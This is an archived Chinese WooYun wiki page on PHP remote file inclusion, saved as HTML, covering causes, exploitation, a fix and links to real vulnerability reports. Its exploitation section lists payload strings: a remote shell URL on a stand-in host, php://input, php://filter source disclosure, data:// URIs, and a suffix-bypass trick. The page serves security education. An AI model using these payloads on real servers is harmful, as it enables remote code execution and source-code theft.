-
Notifications
You must be signed in to change notification settings - Fork 58
/
web:rfi [WooYun WiKi].html
144 lines (99 loc) · 15.2 KB
/
web:rfi [WooYun WiKi].html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta name="exporter-version" content="Evernote Mac 6.8 (453748)"/><meta name="created" content="2016-10-19 12:48:56 +0000"/><meta name="source" content="web.clip"/><meta name="source-url" content="http://wiki.wooyun.org/web:rfi"/><meta name="updated" content="2016-10-19 12:48:56 +0000"/><title>web:rfi [WooYun WiKi]</title></head><body><div style="-evernote-webclip:true"><br/><div style="font-size: 16px"><div style="box-sizing:border-box;font-family:sans-serif;text-size-adjust:100%;font-size:10px;-webkit-tap-highlight-color:rgba(0, 0, 0, 0);"><div style="box-sizing:border-box;font-family:"Helvetica Neue", Helvetica, Arial, sans-serif;font-size:small;line-height:1.42857;color:rgb(51, 51, 51);background:rgb(253, 253, 253);"><div style="box-sizing:border-box;"><div style="box-sizing:border-box;"><span style="box-sizing:border-box;"><div style="box-sizing:border-box;"><div style="box-sizing:border-box;background-color:rgb(255, 255, 255);border-radius:4px;box-shadow:rgba(0, 0, 0, 0.0470588) 0px 1px 1px;"><div style="box-sizing:border-box;"><span style="display:table;"/>
<div style="box-sizing:border-box;position:fixed;float:right;z-index:1024;top:10px;right:10px;">
<div style="float:right;box-sizing:border-box;background-color:rgb(255, 255, 255);border-radius:4px;box-shadow:rgba(0, 0, 0, 0.0470588) 0px 1px 1px;border-color:rgb(221, 221, 221);border:1px solid transparent;margin:0px 0px 1.4em 1.4em;width:auto;color:inherit;font-size:0.95em;margin-left:20px;">
<h3 style="border-bottom:1px solid transparent;box-sizing:border-box;border-top-left-radius:3px;font-weight:bold;color:rgb(51, 51, 51);border-color:rgb(221, 221, 221);background-color:rgb(245, 245, 245);font-family:inherit;line-height:1.1;border-top-right-radius:3px;padding:5px;font-size:0.95em;margin:0px;cursor:pointer;"><i style="box-sizing:border-box;position:relative;top:1px;display:inline-block;font-family:"Glyphicons Halflings";font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;padding-right:5px;"><span style="font-family:"Glyphicons Halflings";font-style:normal;font-weight:400;line-height:1;"></span></i> <strong style="line-height:1;font-weight:400;top:1px;display:inline-block;font-family:"Glyphicons Halflings";font-style:normal;position:relative;-webkit-font-smoothing:antialiased;box-sizing:border-box;float:right;margin:0px 0.2em;padding-right:5px;"><span style="font-weight:400;font-family:"Glyphicons Halflings";font-style:normal;line-height:1;"></span></strong></h3>
</div>
</div>
<h1 style="box-sizing:border-box;font-size:36px;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin:40px 0px 20px;padding-bottom:9px;border-bottom:1px solid rgb(238, 238, 238);margin-top:10px;">远程文件包含(Remote File Include)</h1>
<div style="box-sizing:border-box;"
/>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">1、漏洞简介</h3>
<div style="box-sizing:border-box;">
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
如果允许客户端用户输入控制动态包含在服务器端的文件,会导致恶意代码的执行及敏感信息泄露,主要包括<a href="https://web.archive.org/web/20160417161505/http://wiki.wooyun.org/web:lfi" title="web:lfi" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;">本地文件包含</a>和远程文件包含两种形式。
</p>
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">2、漏洞成因</h3>
<div style="box-sizing:border-box;">
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
文件包含漏洞的产生原因是在通过引入文件时,由于传入的文件名没有经过合理的校验,或者校检被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。当被包含的文件在远程服务器上市,就形成的远程文件包含漏洞。
</p>
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">3、漏洞的检测及利用</h3>
<div style="box-sizing:border-box;">
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
无通用的检测方法,但是大部分扫描器都支持远程文件包含漏洞的检测。
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
以下是常用的引入远程文件的方法
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
常见的协议:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">[http|https|ftp]://example.com/shell.txt</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
(需要allow<em style="box-sizing:border-box;">url</em>fopen=On并且 allow<em style="box-sizing:border-box;">url</em>include=On)
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
利用php流input:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">php://input</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
需要allow<em style="box-sizing:border-box;">url</em>include=On,参考<a href="https://web.archive.org/web/20160417161505/http://php.net/manual/zh/wrappers.php.php" title="http://php.net/manual/zh/wrappers.php.php" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">php:// — 访问各个输入/输出流(I/O streams)</a>,<a href="https://web.archive.org/web/20160417161505/http://www.nowamagic.net/academy/detail/12220520" title="http://www.nowamagic.net/academy/detail/12220520" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">深入剖析PHP输入流 php://input</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
利用php流filter:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">php://filter/convert.base64-encode/resource=index.php</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
需要allow<em style="box-sizing:border-box;">url</em>include=On,参考<a href="https://web.archive.org/web/20160417161505/http://php.net/manual/zh/wrappers.php.php" title="http://php.net/manual/zh/wrappers.php.php" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">php:// — 访问各个输入/输出流(I/O streams)</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
利用data URIs:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">data://text/plain;base64,SSBsb3ZlIFBIUAo=</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
(需要allow<em style="box-sizing:border-box;">url</em>include=On)
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
当服务器自动给文件增加后缀时可以在url之后增加'?'或者'#',便可绕过。
</p>
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">4、漏洞修复</h3>
<div style="box-sizing:border-box;">
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
对引入文件包含的参数进行过滤,或者对所引入的文件的域进行限制,禁止服务器访问可信域以外的文件。
</p>
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">5、实际案例</h3>
<div style="box-sizing:border-box;">
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://www.wooyun.org/bugs/wooyun-2010-059641" title="http://www.wooyun.org/bugs/wooyun-2010-059641" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">春秋航空某分站存在远程文件包含漏洞</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://www.wooyun.org/bugs/wooyun-2010-0107969" title="http://www.wooyun.org/bugs/wooyun-2010-0107969" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">爱爱医某站远程文件包含及mysql盲注</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://www.wooyun.org/bugs/wooyun-2010-012031" title="http://www.wooyun.org/bugs/wooyun-2010-012031" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">华为某系统文件包含漏洞</a>
</p>
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">6、相关资源</h3>
<div style="box-sizing:border-box;">
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://drops.wooyun.org/tips/3827" title="http://drops.wooyun.org/tips/3827" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">PHP文件包含漏洞总结</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://php.net/manual/zh/wrappers.php.php" title="http://php.net/manual/zh/wrappers.php.php" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">php:// — 访问各个输入/输出流(I/O streams)</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://www.nowamagic.net/academy/detail/12220520" title="http://www.nowamagic.net/academy/detail/12220520" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">深入剖析PHP输入流 php://input</a>
</p>
</div>
<span style="display:table;clear:both;"/></div></div></div></span></div></div></div></div></div><br/></div></body></html>